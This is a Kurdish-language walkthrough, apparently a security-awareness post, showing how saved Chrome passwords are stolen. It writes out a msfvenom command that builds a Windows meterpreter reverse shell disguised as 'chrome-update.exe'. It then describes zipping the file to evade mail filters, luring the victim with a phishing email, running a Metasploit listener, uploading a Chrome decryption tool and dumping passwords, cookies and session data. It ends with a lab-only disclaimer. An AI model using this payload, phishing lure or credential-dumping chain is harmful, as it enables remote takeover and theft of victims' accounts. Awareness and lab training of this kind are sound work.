ئەمە ئەو ڕاستییەیە کە زۆربەی خەڵکی لێی بێئاگان. کاتێک وێبگەڕەکانی وەک "کرۆم" وشە نهێنییەکان پاشەکەوت دەکەن، لە ناو پەڕگەیەکی خۆجێیی کۆمپیوتەرەکەتدا کۆیان دەکەنەوە. ڕاستە زانیارییەکان کۆدکراون، بەڵام کلیلەکەی بە هەژماری ویندۆزەکەتەوە بەستراوەتەوە و هەر لەسەر هەمان ئامێریش پارێزراوە.
ئەگەر کەسێک دەستی بە ئامێرەکە بگات، تەنانەت لە ڕێگەی دووریشەوە بێت، دەتوانرێت ئەو پەڕگەیە بکرێتەوە؛ بەمەش وشە نهێنییەکان، کوکییەکان و تەنانەت زانیارییە پاشەکەوتکراوەکانی کارتی بانکییش دەکەونە مەترسیی ئاشکرابوونەوە.
لێرەدا "کیم" دێتە کایەوە، کە هاککەرێکی ئەخلاقییە. ئەرکی ئەو دۆزینەوەی خاڵە لاوازەکانە پێش ئەوەی هێرشبەرە ڕاستەقینەکان پێیان بزانن. ئەو چاوی لە هونەرەکەی "سالی" نییە، بەڵکوو بەدوای ناسنامە دیجیتاڵییەکەیدا دەگەڕێت.
هەر وشەیەکی نهێنیی پاشەکەوتکراو، کلیلێکە بۆ هەژمارە تایبەتەکانی، پۆستی ئەلیکترۆنی، بازاڕکردن و ڕەنگە تەنانەت کاروبارە بانکییەکانیشی. ئەمڕۆئەگەر بمانەوێت نیشانی بدەین کە کاتێک دەستگەیشتن بە ئامێرەکە مسۆگەر بوو، چەندە بە ئاسانی دەتوانرێت دەست بەسەر ئەو کلیلانەدا بگیرێت.
سەرەتا بە دروستکردنی کۆدێکی زیانبەخشی پەیوەندیی پێچەوانە (reverse shell payload) دەست پێ دەکەین؛ بەرنامەیەکی بچووک کە لە کاتی جێبەجێکردنیدا، دەسەڵاتی دەستپێڕەگەیشتنی دوورەدەستی پێ دەبەخشێت. ئەو کۆمپیوتەرێکی لینوکس بەکار دەهێنێت و فایلێکی جێبەجێکاری تایبەت بە ویندۆز بەرهەم دەهێنێت کە پاشان پەیوەندی بە سیستمەکەی خۆیەوە دەبەستێتەوە.
msfvenom -p windows/x64/meterpreter/reverse_tcp
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.239.128 \
LPORT=4444
-f exe
-o chrome-update.exe
ناونیشانی ئای-پیی (IP) خۆی وەک مەبەستی پەیوەندییەکە دیاری دەکات و دەرچەیەکی گوێگرتن هەڵدەبژێرێت. پاشان فایلەکە بنیاد دەنێت و ناوێکی بێوەی وەک "Chrome-Update"ی لێ دەنێت بۆ ئەوەی هیچ گومانێک دروست نەکات.
هەموو شتێک تەواوە و تەنیا یەک هەنگاو ماوە، ئەویش ئەوەیە کە "قوربانیەکە" فایلەکە کار پێ بکات. بۆ ئەم مەبەستە، لە ڕیگەی ئیمەیڵێکی فێڵاوی (phishing) ئامادە دەبێت کە ڕێک لە ئاگادارکەرەوەیەکی فەرمیی نوێکردنەوەی سیستم دەچێت. ناوەڕۆکی نامەکە بە پاساوی پاراستنی ئەمنییەت، هانی دەدات فایلە هاوپێچەکە دابگرێت و جێبەجێی بکات.
زۆربەی کات سیستمەکانی پۆستی ئەلیکترۆنی پەڕگە جێبەجێکراوەکان بەرپەچ دەدەنەوە، هەر بۆیە هێرشبەرەکە کۆدە زیانبەخشەکە دەپەستێنێتە ناو ئەرشیفێکی زیپ (zip)؛ ئەمەش وا دەکات پەڕگەکە کەمتر گوماناوی بێت و بتوانێت بە ئاسانی لە فلتەرەکان تێپەڕ ببێت.
ئیمەیڵەکە دەنێردرێت.
قوربانییەکە نامەکەی پێ دەگات و ئاگادارکردنەوەیەکی بۆ دەردەکەوێت کە وا دەردەکەوێت ڕاستەقینە بێت. پەیامەکە جەخت لە ئەنجامدانی کردارێکی دەستبەجێ دەکاتەوە. قوربانییەکەش بە متمانەکردن بە سەرچاوەکە، پەڕگەکە دایدەگرێت، لە پەستان دەریدەهێنێت و دەیخاتە گەڕ.
لە ڕووکەشدا هیچ شتێکی دیار ڕوو نادات، بەڵام لە پاشبنەمای سیستمەکەدا، پەیوەندی لەگەڵ هێرشبەرەکەدا دروست دەبێت.
لە لایەن هێرشبەرەکەوە، خولێکی پەیوەندی دەکرێتەوە کە دەستڕاگەیشتنی لەدوورەوە بۆ فەراهەم دەکات؛ بەمەش ئامێری قوربانییەکە ڕووبەڕووی دەستبەسەرداگرتن و مەترسی دەبێتەوە.
ئێستا پێویستی بە ڕێگەیەکە بۆ وەرگرتنی پەیوەندییەکە؛ بۆیە لە ڕێگەی "مێتا-سپڵۆیت"ەوە گوێگرێک بەگەڕ دەخات، بە هەمان ڕێکخستنەکانی کۆدە زیانبەخشەکە ڕێکی دەخات و دەست بە چاوەڕوانی دەکات.
هێرشبەرەکە ئاستی دەستڕاگەیشتنی خۆی دەپشکنێت و دڵنیا دەبێتەوە لەوەی کە لە ڕێگەی هەژماری بەکارهێنەری قوربانییەکەوە کار دەکات؛ ئەمەش هەمان ئەو دەسەڵات و مۆڵەتانەی پێ دەبەخشێت کە قوربانییەکە هەیەتی.
ناوبراو وردەکارییەکانی سیستمەکە دەپشکنێت، وەک جۆری سیستمی کارپێکردن و تەلارسازییەکەی. هێرشبەرەکە لە جیاتی ئەوەی بە شێوەیەکی دەستی داتاکانی وێبگەڕ دەربهێنێت، ئامرازێکی وەکو "Chrome-App-Bound-Encryption-Decryption
"پسپۆڕانە بەکار دەهێنێت کە بۆ بەدەستهێنانەوەی زانیارییەکانی چوونەژوورەوەی پاشەکەوتکراو دیزاین کراوە.
ئامرازەکە دادەگیرێت و پاش ئامادەکردنی، بۆ ناو ئامێرە هاککراوەکە دەگوازرێتەوە.
upload /home/kali/Downloads/chrome-injector-v0.20.0/chromelevator_x64.exe C:\Windows\Temp\
دوای گواستنەوە/Upload
هێرشبەرەکە لە ڕێگەی ڕووکارێکی فەرمانبەریی دوورەدەستەوە (Remote Shell)، دەچێتە ناو بوخچەی مەبەست و خۆی بۆ جێبەجێکردنی ئامرازەکە ئامادە دەکات.
ئامرازەکە دەخرێتە گەڕ، وێبگەڕەکە دەکاتە ئامانج و شوێنێکی دیاریکراو بۆ پاشەکەوتکردنی دەرەنجامەکان دەستنیشان دەکات. لە چەند چرکەیەکی کەمدا، تەواوی زانیارییە کۆگاکراوەکان، لەوانە ناسێنەرەکان (cookies)، وشە نهێنییەکان و زانیارییەکانی چوونەژوورەوە (session data) ڕادەکێشێت.
دەرەنجامەکان لە نێو پەڕگەگەلێکی ڕێکخراودا پاشەکەوت دەکرێن.
هێرشبەرەکە پەڕگەی وشە نهێنییەکان دەکاتەوە و داتاکان بە شێوەی دەقێکی ڕوون دەبینێت؛ ناونیشانی ماڵپەڕەکان، ناوی بەکارهێنەر و وشە نهێنییەکان، هەموویان بە ئاشکرا دەردەکەون.
ئەوەی قوربانییەکە پێی وابوو بە پارێزراوی کۆگاکراوە، ئێستا بە تەواوی پەردەی لەسەر لادراوە. ئەو ئاسانکارییەی وێبگەڕەکان دەیڕەخسێنن، مەترسیی گەورەشی لەپشتە؛ هەر کە دەستگەیشتن بەدی هات، زانیارییە هەستیارەکان بە خێرایی کۆ دەکرێنەوە و بەکار دەهێنرێن.
بەهیوای سەلامەتی
ئەم تاقیکرنەوەیە لەسەر تاقیگە تاقی کراوەتەوە/ بەرپسیار ئەبێت لە هەڵە باکارهێنانی.
